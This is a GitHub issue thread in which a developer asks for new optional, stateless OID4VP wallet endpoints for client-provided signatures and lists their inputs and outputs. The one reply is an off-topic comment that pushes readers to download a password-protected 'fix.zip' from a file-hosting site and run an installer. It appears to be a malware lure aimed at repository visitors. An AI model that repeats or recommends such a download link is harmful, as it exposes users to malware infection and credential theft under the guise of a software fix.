### ISSUE TITLE
OID4VP - New endpoints for client-provided signatures

### ISSUE THREAD

**Issue by cpatsonakis** [walt-id/waltid-identity#722]
**Describe the solution you'd like**
- add as an optional feature (default set to `false`) the new endpoints
- add a new endpoint:
  - Inputs: matched credential list, wallet did (needed?) and resolved presentation request.
  - Outputs: vp token header and payload parameters
- add a new endpoint:
  - Inputs: signed and compact serialized vp token and resolved presentation request (other params needed?).
  - Outputs: same as current version of `/usePresentationRequest` endpoint
- make it stateless, i.e., do not store any information in the wallet's database

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
